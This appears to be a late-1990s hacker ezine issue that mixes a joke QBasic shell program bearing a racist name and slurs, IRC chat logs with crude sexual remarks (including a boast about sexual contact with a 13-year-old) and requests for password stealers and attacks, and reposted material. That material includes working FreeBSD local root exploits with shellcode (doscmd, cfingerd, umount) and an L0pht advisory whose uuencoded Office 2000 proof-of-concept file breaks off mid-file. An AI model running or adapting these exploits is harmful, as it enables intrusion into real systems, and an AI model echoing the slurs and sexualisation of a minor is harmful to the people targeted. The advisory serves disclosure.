0000 00000000 000000000 000000 000000000 00000000 [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ b0g article # 9 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ ::::::::::::::: Negr/OS - dialect - dialect@home.com ::::::::::::: ] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ note from the editor, sorry about messing up the appearance of your leet ascii :( ] Negr/OS is the latest underground news since phf baby ! . Elitely and stablely coded in one of todays most widely used and trusted language Qbasic. Yep !.Thats right . Placing youz in total fear mode is our ob- jec-tive here at stupidphat. Latest kernel' build' out now is kernel 3.1.3.3.7 Source is freely distributed so have fun messing with it. To successfully run negr / OS You need QBASIC. If you dont have it could could download QBASIC Here: http://dialect.stupidphat.com/qbasic.exe. ASM format is available only for the leet++ at: http://dialect.stupidphat.com/neg.asm Screenshots of Negr/OS in action can be found here: http://dialect.stupidphat.com/neg1.jpg http://dialect.stupidphat.com/neg2.jpg http://dialect.stupidphat.com/neg3.jpg Don take me wrong. This is all a big joke and I'm not racist (sometimes) and ummmm this project isnt supposed to be all that. I will tell you though. that negr/OS DOES WORK. its not really an os. just a dos shell. but the name fit well :D REM **** negr/OS ****** REM Kernel 3.1.3.3.7 REM **** dialect ****** DIM login$ DIM pw$ DIM prompt$ DIM dir$ DIM rm$ DIM host$ DIM yourmoma$ REM no_need_to_DIM_anything$ CLS COLOR 10 SCREEN 12 PRINT " " PRINT " " PRINT " NNN NNNN //// OOOOOOOOOOO SSSSSSSSSSS" PRINT " NNNN NNNN //// OOOOOOOOOOO SSSSSSSSSSS" PRINT " NNNNN NNNN //// OOOO OOOO SSSS" PRINT " NNNNNN NNNN eeeeeeee gggggggg rrr rrrr //// OOOO OOOO SSSSSSSSSSS" PRINT " NNNNNNNNNNN eee eee ggg ggg rrrrrrrr //// OOOO OOOO SSSSSSSSSSS" PRINT " NNNN NNNNNN eeeeeeee ggg ggg rrrr //// OOOO OOOO SSSS" PRINT " NNNN NNNNN eee ggg ggg rrr //// OOOOOOOOOOO SSSSSSSSSSS" PRINT " NNNN NNN eeeeeeee gggggggg rrr //// OOOOOOOOOOO SSSSSSSSSSS" PRINT " ggg" PRINT " gggggggg" PRINT " " PRINT " The Black Operating System !" PRINT PRINT PRINT PRINT PRINT PRINT PRINT PRINT PRINT PRINT "(Stupidphat.com) negr/OS (ttyp1) fastlink01" SCREEN 12 LINE (25, 25)-(52, 67), B LINE (214, 234)-(23, 45), B, B COLOR 3 PRINT SCREEN 12 PRINT 1 INPUT "login: ", login$ INPUT "password: ", pw$ IF pw$ = "pass" THEN PRINT COLOR 8 PRINT "Negr/OS Kernel Build : 3.1.3.3.7. " PRINT COLOR 3 PRINT "Logged in as user: "; PRINT login$ PRINT "Your shell is /negros/shells/freshmozzarela&sausage" PRINT PRINT "# MOTD" PRINT "Welcome to Negr/OS ! Type help for commands @#$"; "" PRINT PRINT GOTO 2 ELSE PRINT COLOR 7 PRINT "Invalid username or password" PRINT COLOR 3 GOTO 1 END IF 2 PRINT "["; COLOR 4 PRINT login$; COLOR 3 PRINT "@"; INPUT "negr/OS ]> ", sysprompt$ IF sysprompt$ = "adduser" THEN INPUT "Enter the new user name :", user$ INPUT "Enter a password :", pass1$ INPUT "Re-Enter the password : ", pass2$ END IF IF pass1$ = pass2$ THEN OPEN "usrs.txt" FOR OUTPUT AS #1 PRINT #1, "Username : " + user$ PRINT #1, "Password : " + pass1$ CLOSE #1 ELSE PRINT "Passwords did not match" GOTO 2 END IF IF sysprompt$ = "dir /w" THEN SHELL "dir /w" GOTO 2 END IF IF sysprompt$ = "dir /p" THEN SHELL "dir /p" GOTO 2 END IF IF sysprompt$ = "rm" THEN PRINT COLOR 9 INPUT "[RM File] ", rm$ SHELL "del " + rm$ COLOR 3 GOTO 2 END IF IF sysprompt$ = "" THEN GOTO 2 END IF IF sysprompt$ = "cls" THEN SHELL "cls" GOTO 2 END IF IF sysprompt$ = "clear" THEN SHELL "cls" GOTO 2 END IF IF sysprompt$ = "ver" THEN PRINT COLOR 10 PRINT "Negr/OS Version 3.1.3.3.7 and dont ever forget it!" PRINT COLOR 3 GOTO 2 END IF IF sysprompt$ = "fdisk" THEN SHELL "c:\windows\system\fdisk.com" GOTO 2 END IF IF sysprompt$ = "ping" THEN PRINT COLOR 9 INPUT "[Ping target] ", host$ SHELL "ping " + host$ COLOR 3 GOTO 2 END IF IF sysprompt$ = "help" THEN PRINT COLOR 12 PRINT "cd help rm ver who dir " PRINT "hello.c cd .. a: pwd rm -rf logout " PRINT "exit time txt c: hi Unix " PRINT "cls clear fdisk ping adduser dir /w/p" PRINT COLOR 3 GOTO 2 END IF IF sysprompt$ = "cd" THEN PRINT COLOR 9 INPUT "[ Dir ] ", dir$ SHELL "cd " + dir$ COLOR 3 GOTO 2 END IF IF sysprompt$ = "pwd" THEN SHELL "cd" GOTO 2 END IF IF sysprompt$ = "dir" THEN SHELL "dir" GOTO 2 END IF IF sysprompt$ = "cd .." THEN SHELL "cd .." GOTO 2 END IF IF sysprompt$ = "a:" THEN SHELL "a:" GOTO 2 END IF IF sysprompt$ = "hello.c" THEN PRINT COLOR 8 PRINT PRINT "HELLO WORLD #@$@#$! " PRINT COLOR 3 GOTO 2 END IF IF sysprompt$ = "rm -rf" THEN PRINT COLOR 8 PRINT PRINT " j00 fucking mor0n !" PRINT COLOR GOTO 2 END IF IF sysprompt$ = "logout" THEN CLS GOTO 1 END IF IF sysprompt$ = "exit" THEN END END IF IF sysprompt$ = "who" THEN PRINT COLOR 4 PRINT login$ PRINT COLOR 3 GOTO 2 END IF IF sysprompt$ = "time" THEN SHELL "time" PRINT GOTO 2 END IF IF sysprompt$ = "c:" THEN SHELL "c:" PRINT GOTO 2 END IF IF sysprompt$ = "ls" THEN PRINT COLOR 15 PRINT "best step !$# : try dir instead : neener neener."; PRINT COLOR 3 PRINT "." GOTO 2 END IF IF sysprompt$ = "txt" THEN PRINT COLOR 8 INPUT "[ TXT ] ", txt$ SHELL "" + txt$ COLOR 3 GOTO 2 END IF IF sysprompt$ = "hi" THEN PRINT "hi" ELSE PRINT COLOR 15 PRINT ":nigga best recognize : ["; COLOR 5 PRINT sysprompt$; COLOR 15 PRINT "] : not a command"; COLOR 3 PRINT "." PRINT GOTO 2 END IF IF sysprompt$ = "cd" + dir$ THEN PRINT COLOR 8 INPUT "[ Dir ] ", dir$ SHELL "cd " + dir$ COLOR 3 GOTO 2 END IF [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ b0g article # 10 ::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ ::::::::::::::: irc quotes � misc � irc.undernet.org ::::::::::::: ] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] prae r u female? or wut? Hey everyone, I NEED MAJOR HELP! Please, if you know how to lag someone out of any "Microsoft Internet Gaming Zone" game, I WOULD LIKE TO KNOW! Please, I am desperate! Message me, thank you!!!! the first chick that gave me oral was only 13...she could barely take it n her mouth, i had teethmarks on my penis for a week chris`: are you learning disabled by any chance? you got aol private chat room names? twist: will you show her my pic and tell her that i like her, then ask if she could ever love a guy like me lol@ me gettin sad and icq'in prae hehe eh? nah bob why not? i got caught by my little sister masterbating to some online porn she said, "what are you doing to that" i said "trying to kill it" and "can you help me" lol doesnt no one care this is child abuse i was only joking geez you really think ? mg issues [canonbal:#hacktech PING] unlagging slowly heh *** canonbal` has quit IRC (Lost irc connection from 207.170.201.226: Broken pipe) hello? Does anyone know anything about earthserv webpage provider i got an account but now it says the site has no dns entry it used to just say page contains no data.does anyone know why or when earthserv will be running again? <`DS> anybody know where to find violence stats? I JUST WROTE MY FIRST PERL PROGRAM!!! IM SO FUCKING ELITE FUCK YOU ALL HAHAHAHAHAAHHA splendid james FUCK YOU ALL!!!!!!!!!!!!!!!!!!!!!!! uhm... i wrote my 27th TCL script today lol hello.pl ? :( before you fcrashed me NO you twat oh its far more k-rad * twist182 giggles prae :( twist yeah what perl book is it? what one are you reading? 'perl for canadian fags' i need help here about a cble modem to nuke theres a girl who has take my nick and put it on a child porn chan and im unable to nuke that bitch shes on cable im in winshit bob how come smoking makes me horny? watching people smoke makes me erect, is this a problem? *** |RAT| has joined #k-rad did you signup bob? yes h0h0h0h0h0h basic? MASTER! <|RAT|> hmmmmmm elite! Vicki is such a sweetie you'll see what about bandwith? <|RAT|> Isn't this a hacking channel???? fast yes rat no rat its a sex channel <|RAT|> ooooops *** |RAT| has left #k-rad its also a sex channel hahahaha!!!!!! NOONE IS LEAVING THIS CHANNEL WITHOUT A GROUP HUG *** sdf was kicked by RLoxley (Too many damn caps!) *** asmith has joined #hacktech hi can somone send me a prog that gets i-net p-words and u-names Anyone know where I can get getadmin.exe roses are red and violets are twisted, bend over james cause you're about to get fisted. alot of black metal bands butt fuck eachother on stage eww this girl at my old highschool once was dared to shove a hotdog intoside herself and she got it like all the way and it broke off. she had to go to the hospital and get it removed. i dunno i felt like sharing that. probably becaus i am in a goofy mood now. *** twist182 has quit IRC (Excess Flood) *** twist182 has joined #hackphreak *** twist182 has quit IRC (Excess Flood) twist=0wned hey. i went to mplayer last night. its still gay so you blended in quite well? im having sex with my left hand from now on prae bob, why the switch? !? im ambedextrus i use both :) i use my feet to make my right one jealous so that she'll work way harder when i give her another chance *** A17mPA has joined #hacktech hi every1. Question. Has anyone heard of something called AOL IM Sysop? or something like that How well does getadmin.exe work? We need more women in here.. thats the problem in a nutshell... women that aren't to bright so they will go along with anything we say haha does anybody have a unix i can borrow?????? *** RLoxley has joined #hacktech hey RL [5m [1;31mh [1;32me [1;34ml [1;33ml [1;31mo [1;32m, [1;34mh [1;33ma [1;31mc [1;32mk [1;34me [1;33mr [1;31ms [0m *** RLoxley is now known as grid coOOl i dont feel gay anymore i am cured goodbye for now. *** grid has left #hacktech *** fraglord has joined #hacktech *** RLoxley is now known as grid rloxley and grid arent the same ppl are they? Heh does anyone have a webpage or know of a cool program that hacks ICQ passwords or hotmail passwords I've got more skills on the tip of my cock then you've got in your whole brain!!! i havent been afk for like 5 days *** thep0et has Quit IRC (I'm black and i don't work for a living...are you surprised?) i find masturbation a good way to make bath's more fun they cant talk about security, 2600 dont know shit about security *** ZeRiAl has joined #hackphreak hey you guys, u happen to know of a program to get login and pswd from a porn site? *** M1K4 has joined #hackuk i need some carding instructions * Prae2k/#k-rad is learning how to masturbate whilst doing a handstand * thep0et/#k-rad is learning how to ignore prae's stupid pointless comments which make no sence what so ever *** alltra has joined #hacktech anyone know anyhting that will screw someone over real bad if all I have is their ip number? could you imagine if our penises acted like elephant trunks? and we had to feed our selves like that *** tobsgal has joined #hackuk any lesbian or bi females want to chat *** ubre has joined #HackTech hi, guys pls help. How do i see someone's IP server in a chat? *** SpeedSwim has joined #HackTech hety any of you have a big virus or kno where I cna get one? *** hey has joined #HackTech is they re somebody who could tell me how to hack somebody on irc our can give me a sites???????????????????? without masturbation there is nothing sekz, i serioulsy used to masturbate about 15 to 20 times a day seriously even *** thik has joined #hacktech Can anybody show me how to hack ???? *** weesel has joined #hacktech hello does anyone know of a proggie that will let me into someones HDD useing ICQ? *** Drumguy has joined #hacktech Anybody know operatior or administraitor Yahoo Chat commands? Anybody know operatior or administraitor Yahoo Chat commands? Anybody know operatior or administraitor Yahoo Chat commands? Anybody know operatior or administraitor Yahoo Chat commands? *** Drumguy has joined #hacktech Does anybody know kick certain people out of Yahoo Chat Rooms? *** moeska has joined #hacktech can someone tell me how to ping to a specified port? *** bcsiss has joined #hacktech i need help with? * fraggy is back: from -(tv)- gone -(10mins 56secs)- is there anyway to hack into someone elses computer through mirc? *** Killer has joined #hacktech can someone disconnect a clone of me that has fucked up? *** Zero|kewl has joined #hacktech *** hst has quit IRC (bbl) does anybody use wwwhack? *** Freddo has joined #hacktech does anybody know NT hack??? -X- Ban list updated * h420i is away: -(could irc be any more boring?)- since -(23:18)- pager -(on)- does anybody know NT hack??? *** G|GAWH0RE has joined #hacktech isn't freddo the guy who gets shot in the movie? ??? n/m :P *** koshie has quit IRC (Ping timeout for koshie[get.your.free.shell.at.shellyeah.org]) http://www.tuxedo.org/~esr/faqs/hacker-howto.html sorry wrong paste lol as opposed to the right paste? you nail him fraggy does anybody know NT hack??? eh? this is correct w0rd bob he is just asking a question :P hehe sowwie so ... does anybody know NT hack??? lol i cant help myself haha Freddo, say that again. i crack up everytime i read that <|cH|cKeN|> hehe ok... does anybody know NT hack??? *** lioufman has joined #hacktech HEH *** cTq has left #hacktech * lioufman exei pathei plaka me to <> by NiRVaNaiR [100% Megali eukolia dike mou] *** Mike`` has joined #hacktech can someone help me with something? what is it? i got a pw cracker but i can't get it to work *** Mike`` was kicked by fraggy ( i got this AOL punter proggie but i don't know how it works....... oh, never mind ) *** Mike`` has joined #hacktech funny?? <|cH|cKeN|> not really yes. very <|cH|cKeN|> ur just gay *** L_Mental has joined #hacktech need to know: are there any binders for exe+image? *** kingpin1 has joined #hacktech __ ___ ___ /\ \ /\_ \ /\_ \ \ \ \___ __\//\ \ \//\ \ ___ \ \ _ `\ /'__`\\ \ \ \ \ \ / __`\ \ \ \ \ \/\ __/ \_\ \_ \_\ \_/\ \L\ \ \ \_\ \_\ \____\/\____\/\____\ \____/ \/_/\/_/\/____/\/____/\/____/\/___/ hi can i ask you a few questions? ok pls firstly, are you a man or a woman? man and gay u im a man where do you live? istanbul What is the first thing that pops into your head when i say poop? noth�ng nothing? how do you feel about poop? do you think its good or bad? you mean poop mus�c no i mean poop as in shit the brown stuff that comes from your anus bad why is it bad? you are realy sh�t and why is that? does poopsex.com disgust you? ok, so.. if i say "I want to poop in your mouth." what does that make you feel? angry? happy? pls be n�ce man chat n�ce th�ngok but i want to know how you feel about poop please, tell me.. ok pls you dont want to be n�ce i leave by how can i edit file in unix ? with a text editr but real men use magnetic tipped needles to directly write to the hd platter ahh what text editor ? *** TuCoWS has joined #hacktech Hola Intercambio utilidades, nuckes antinuckes, virus antivirus, troyanos antitroyanos, cortafuegos, antiflood, floods, crackers, antiBO antiNetbus, manuales sobre informatica en gral. como irc telnet o lo que sea, si tienen alguna las intercambiamos por correo electronico no por "dcc send", en especial busco spoofers y patchs para windows 98, quien este interesado escriba asi : /query tucows , y me encontraran, gracias *** TuCoWS has left #hacktech >:\ my mouse is fucked up i think its drunk lol * madwill hands praes mouse another beer >:\ he had enough i wrote 'CUNT' on it about 6 months ago i can still see it im sorry for nuking you earlier :( EVERYONE its ok, i dont think i was at the computer ADSL gets here in 6 months. MCX WANTS TO APOLOGIZE FOR HIS NUKING [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ b0g article # 11 ::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ ::::::::: notes from the editor � k-rad-bob � 808@c2i.net :::::::: ] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] AGH! So much work. Editing this issue has been hell, but still it has been a joy. Issue two is out and we have proven that we aren�t a one time only zine, like *cough* pursuit and *cough* b4b0 and *cough* phrack. Also the feedback we have been receiving has been nothing less but heartwarming. Now all that is left to be said is: Contribute or die! Link our site or die! Mass forward our URL to everyone on your icq, email it to everyone you can, and Spam all the Usenet groups with it! This issue could be better but due to the fact that our domain is finally up and running we are all exited so here goes nothing. Official b0g site: http://www.b0g.org Contact: irc in #k-rad on undernet By email: b0g@b0g.org Contributions can be sent to contribute@b0g.org Thats all :) Shouts and hi�s goes out to all of #k-rad #hacktech #hackuk #whhs and to all the other undernet dogs! @HWA 162.0 FreeBSD 3.4-STABLE exploit doscmd.c ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://infected.ilm.net:8101/new.htm /* * * (c) 1999 babcia padlina ltd. * FreeBSD 3.4-STABLE /usr/bin/doscmd exploit. * */ #include #include #include #include #define NOP 0x90 #define BUFSIZE 1000 #define ADDRS 1200 long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(argc, argv) int argc; char **argv; { char *execshell = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; char *buf, *p; int noplen, i, ofs, align; long ret, *ap; FILE *fp; if(!(buf = (char *)malloc(BUFSIZE+1))) { perror("malloc()"); return -1; } if (argc < 3) { fprintf(stderr, "usage: %s ofs align\n", argv[0]); exit(0); } ofs = atoi(argv[1]); align = atoi(argv[2]); noplen = BUFSIZE - strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen); buf[noplen+1] = '\0'; strcat(buf, execshell); setenv("EGG", buf, 1); free(buf); if(!(buf = (char *)malloc(ADDRS+align+1))) { perror("malloc()"); return -1; } memset(buf, 'a', align); p = &buf[align]; ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = '\0'; fprintf(stderr, "ret: 0x%x\n", ret); execl("/usr/bin/doscmd", "doscmd", buf, 0); return 0; } /* �=-�� passed thru infected network ��-=� */ /* �=-�� http://infected.ilm.net/ ��-=� */ @HWA 163.0 cfingerd 1.3.3 (*bsd) root sploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://infected.ilm.net:8101/new.htm /* * babcia padlina ltd. * cfingerd 1.3.3 (*bsd) root sploit * * usage: adjust ptr until cfingerd will segfault with some random data on * output, now adjust ret. */ #include #include #include #include #include #include #include #include #include #define BUFFER_SIZE 80 #define ADDRS 190 #define PTR 0xbfbfd750 #define RET 0xbfbfd7d2 #define NOP 0x90 #define FILE1 "user.inf" #define FILE2 "hack" #define FILE3 "set.c" #define SHELL "/tmp/sh" #define FINGER 79 #define MAXLINE 1024 #define LOCALHOST 0x7f000001 #define GREEN "\E[1;32m" #define RED "\E[1;31m" #define NORM "\E[1;39m" #define UNBOLD "\E[m" void sh(sockfd) int sockfd; { char buf[MAXLINE]; int c; fd_set rf, drugi; FD_ZERO(&rf); FD_SET(0, &rf); FD_SET(sockfd, &rf); while (1) { bzero(buf, MAXLINE); memcpy (&drugi, &rf, sizeof(rf)); select(sockfd+1, &drugi, NULL, NULL, NULL); if (FD_ISSET(0, &drugi)) { c = read(0, buf, MAXLINE); send(sockfd, buf, c, 0x4); } if (FD_ISSET(sockfd, &drugi)) { c = read(sockfd, buf, MAXLINE); if (c<0) return; write(1,buf,c); } } } int connectto(void) { int sockfd; char sendbuf[MAXLINE]; struct sockaddr_in cli; bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_addr.s_addr=htonl(LOCALHOST); cli.sin_port = htons(FINGER); if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); return -1; } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) { perror("connect"); return -1; } sprintf(sendbuf, "%.1023s\n", getenv("LOGNAME")); write(sockfd, sendbuf, strlen(sendbuf)); sleep(1); fflush(stdout); fflush(stderr); sh(sockfd); return; } int main(argc, argv) int argc; char **argv; { char *buf1 = NULL, *buf2 = NULL, *p = NULL; u_long *addr_ptr = NULL; int noplen, i, bufsize = BUFFER_SIZE, addrs = ADDRS; int retofs = 0, ptrofs = 0; long ret, ptr; FILE *phile; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff"SHELL"\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; fprintf(stderr, "\n"GREEN"babcia padlina ltd. cfingerd local root exploit"NORM UNBOLD"\n\n"); if(argc > 5) { bufsize = atoi(argv[1]); addrs = atoi(argv[2]); ptrofs = atoi(argv[3]); retofs = atoi(argv[4]); } if(!(buf1 = malloc(bufsize+1))) { perror("malloc()"); return -1; } if(!(buf2 = malloc(addrs+1))) { perror("malloc()"); return -1; } ret = RET + ptrofs; ptr = PTR + ptrofs; noplen = bufsize - strlen(execshell); memset(buf1, NOP, noplen); strcat(buf1, execshell); p = buf2; addr_ptr = (unsigned long *)p; for(i = 0; i < (addrs / 4) /2; i++) *addr_ptr++ = ptr; for(i = 0; i < (addrs / 4) /2; i++) *addr_ptr++ = ret; p = (char *)addr_ptr; *p = '\0'; if ((phile = fopen(FILE1, "w")) == NULL) { perror("fopen()"); return -1; } fprintf(stderr, GREEN "RET:" RED "0x%x\n" GREEN "PTR:" RED "0x%x%\n\n" GREEN "setting up..." NORM UNBOLD "\n", ret, ptr); fprintf(phile, "#Changing user database information for %s.\n" "Shell: %s\n" "Full Name: %s\n" "Office Location: %s\n" "Office Phone: \n" "Home Phone: \n" "Other information: \n", getenv("LOGNAME"), getenv("SHELL"), buf2, buf1); fclose(phile); if ((phile = fopen(FILE2, "w")) == NULL) { perror("fopen()"); return -1; } fprintf(phile, "cat user.inf>\"$1\"\n"); fprintf(phile, "touch -t 2510711313 \"$1\"\n"); fclose(phile); if ((phile = fopen(FILE3, "w")) == NULL) { perror("fopen()"); return -1; } // buffer is too small to execute seteuid/setegid there, so we have // to do this here. fprintf(phile, "main() { seteuid(getuid()); setegid(getgid()); system(\"id\"); execl(\"/bin/sh\", \"sh\", 0); }"); fclose(phile); system("/usr/bin/cc -o " SHELL " " FILE3); unlink(FILE3); system("EDITOR=./" FILE2 ";export EDITOR;chmod +x " FILE2 ";chfn > /dev/null 2>&1"); unlink(FILE1); unlink(FILE2); if (connectto() < 0) return -1; unlink(SHELL); return 0; } /* �=-�� passed thru infected network ��-=� */ /* �=-�� http://infected.ilm.net/ ��-=� */ @HWA 164.0 FreeBSD 3.3-RELEASE /sbin/umount exploit. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://infected.ilm.net:8101/new.htm /* * * (c) 1999 babcia padlina ltd. * FreeBSD 3.3-RELEASE /sbin/umount exploit. * */ #include #include #include #include #define NOP 0x90 #define OFS 1800 #define BUFSIZE 1024 #define ADDRS 1200 #define DIR "babcia padlina ltd." long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(argc, argv) int argc; char **argv; { char *execshell = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; char *buf, *p; int noplen, i, ofs; long ret, *ap; if(!(buf = (char *)malloc(BUFSIZE+1))) { perror("malloc()"); return -1; } if (argc > 1) ofs = atoi(argv[1]); else ofs = OFS; noplen = BUFSIZE - strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen); buf[noplen+1] = '\0'; strcat(buf, execshell); setenv("EGG", buf, 1); if(!(buf = (char *)malloc(ADDRS+1))) { perror("malloc()"); return -1; } p = buf; ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = '\0'; fprintf(stderr, "RET: 0x%x len: %d\n\n", ret, strlen(buf)); chdir(getenv("HOME")); chmod(DIR, 0755); rmdir(DIR); mkdir(DIR, 0755); chdir(DIR); chmod(".", 0); execl("/sbin/umount", "umount", buf, 0); return 0; } /* �=-�� passed thru infected network ��-=� */ /* �=-�� http://infected.ilm.net/ ��-=� */ @HWA 165.0 l0pht advisory 03/06/2000 ClipArt gallery overflow. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: http://www.l0pht.com/ @Stake Inc. L0pht Research Labs www.atstake.com www.L0pht.com Security Advisory Advisory Name: ClipArt Gallery Overflow Advisory Released: 03/06/00 Application: Microsoft Office 2000 Severity: An attacker can seize control of a Windows 95, 98, NT, or 2000 machine via any HTML source, including Microsoft Outlook e-mail. Status: Vendor patch available, workaround available Author: dildog@l0pht.com WWW: http://www.l0pht.com/advisories.html Overview: ClipArt Gallery (CAG.EXE) that comes with Microsoft Office 2000 processes ".CIL" files for installation of clipart from the Internet. The CIL format is not handled properly by CAG.EXE and one of the internal fields in the file presents a buffer overflow condition, allowing arbitrary code to be executed by an attacker. The attacker would place a malicious CIL file on a website, or in an email, causing the target to import the CIL file. The file will be opened without prompting as the CIL file format does not require confirmation for open after download. This issue requires NO active scripting to exploit, and is NOT regulated by Internet Explorer 'security zones'. Description: The ".CIL" file format is a compressed clip-art delivery format that takes a Windows Metafile (WMF) or other image, stores it compressed, and packages it with keywords and descriptive information. Amongst the various fields in the CIL format are a few Unicode strings, one of which is the filename to which the clipart is to be decompressed. If the filename specified is extremely long, a stack overflow occurs after a Unicode to ANSI conversion, copying the ANSI version of the buffer over the stack frame. Unfortunately, the current fix for this issue is really only a bandaid to the problem that Internet Explorer is used -for everything- nowadays and that its HTML parser allows random file formats to be downloaded and parsed without confirmation in a number of cases. One can expect to see similar issues to this in the future. Vendor provided fix: Get your patch here: http://www.microsoft.com/technet/security/bulletin/ms00-015.asp Quick solution: One may wish to go through all of the file type associations and turn on the 'Confirm Open After Download' checkbox to ensure that suspect file types are not automatically executed without user intervention. To do this in Windows 2000, open up a standard Explorer window (such as My Computer), and go to the Tools menu and choose "Folder Options". Under the "File Types" tab, go to the "CIL" file type and click on it. Now press the "Advanced" button. You will notice that the checkbox "Confirm Open After Download" is unchecked. Check it, and then click OK. Exploit: This CIL file will create a harmless registry key when opened. The registry key location is: HKLM\Software\Microsoft\Windows:dword,SMACK!=0x00000001 This is proof of concept code only, but theoretically could be any executable code desired. This code works only on Windows 2000, but shifting around a few offsets yields code that works under Windows NT 4.0 and Win9X. <--- cut here ---> begin 644 nt5.cil M4P!0`$P`20!4`$,`20!,`#,```"T$```U\W&F@``XO_B__H+^@M>`@````!/ M50$`"0```T\(```#`#P!``````4````,`ML+VPL%````"P(`````!`````4! M`0`$````!`$-``0````&`0$`!`````(!`@`%`````0+___\`!````"X!&``( M````^@(`````````````!````"T!```%`````0+___\`!P```/P"```````` M```$````+0$!``@```#Z`@```0`!```````$````+0$"``0```#P`0``.`$` M`"0#F@"=`H@!:@./`8@#AP&]`ZP!M`.2`:L#D@&/`W(!8P-^`;D"70'P`C@! M3@,``;$#T0`7!*@`@`2(`.L$<`!7!6$`Q059`.`%60#_!5D`_P4``(T%`P`= M!0X`K@0B`$$$/@#6`V$`;@.-``H#P`"J`OH`3@([`?@!@P&G`=$!7`$F`A`T<%\@-I!04$B04>!+8%&P3'!1T$U@4F!.`%X`7@!>`% MOP/3!;\#MP7&`Y0%VP.*!>,#!?L$&P7K!`X%R`3Z!+L$\`2>!,@$=@1_!%8$3`0L!"$$*@0#!"$$W@/> M`T,#U`,F`\(#Y0*Y`XD"X`-K`NP#60(*!'$"(`1E`EX$8`),!7\"3@6*`D$% MD0*#!'\"7@1@`B$$90):!*`"4`6G`F4%FP)L!7\"X`6'`N`%_P$J!)4!#@1O M`14$6P&S`V0!OP.'`;H#CP&T`Y(!O0.L`;\#GP'9`Z,!&`3F`04$\@'U`^$! MY`/6``%X`6_`],%OP.W!<8#E`7;`XH%XP-S M!>P#7`4$!$T%'00\!3<$,`66!"4%K`0M!=T$-07L!$\%^@1?!1T%;`5!!7`% M405>!4L%505(!4`%1`4W!3L%+@4S!1@%+@4+!1X%^P0;!>L$#@7(!/H$NP3P M!)X$R`1V!'\$5@1,!"P$(00J!`,$(03>`]X#0P/4`R8#P@/E`KD#B0+@`VL" M[`-9`@H$<0(@!&4"7@1@`DP%?P).!8H"0061`H,$?P)>!&`"(01E`EH$H`)0 M!:<"906;`FP%?P+@!8<"X`7_`2H$E0$.!&\!%01;`;,#9`&_`XG`P@'X0/W M!B($]P9L!/<&L`3P!LP$YP;J!-P&#`7.!A$%Q`8`%:`?@!5H'R@5L!Y8%E``Z8'3@.L!]4"IP>S`J,'J0+'!ZL"S`?%`J<'LP*L!]4"T`?T`N('YP+@ M!Z`"G`BS`NP(N0+G"*`"D0B=`MD'=`+`!WH"F@=U`HH'7P)^!U`"6P=!`B\' M0@(8!RP"[@8\`O\%!`+_!8D""````/H"```(``@```````0````M`0``!``` M`/`!`@".````)0-%`/\%B0+1!J("W`;'`O0&V0(^!_,".P<-`Q@'IP,(!^$# M]P8B!/<&;`3W!K`$\`;,!.<&Z@3@8K!8@&"@6%!NX$C`;&!(\&DP2%!FH$?`8O!&<& M#01L!@`$;`;L`TP&Q@/_!;X#_P7@!6@'X`5:!\H%;`>6!90')`6C!\`$N@<6 M!+D'W@.F!TX#K`?5`J<'LP*C!ZD"QP>K`LP'Q0*G![,"K`?5`M`']`+B!^<" MX`>@`IP(LP+L"+D"YPB@`I$(G0+9!W0"P`=Z`IH'=0**!U\"?@=0`EL'00(O M!T("&`!A0`30!,@+#075"WT%V@O\!8X+_`6."^`%B@N(!7X+&P5I"[`$3`M&!"<+WP/Z M"GL#Q@H:`XL*O@))"F8"``H5`K()R`%="8(!!`E#`:8("@%$"-D`W@>P`'8' MC@`,!W0`H`9C`#(&6@#_!5D`"````/H"```(``@```````0````M`0``!``` M`/`!`@!@````)0,N`/\%60#_!0``;@8&`-X&%`!-!RH`N0=(`",(;@"*")P` 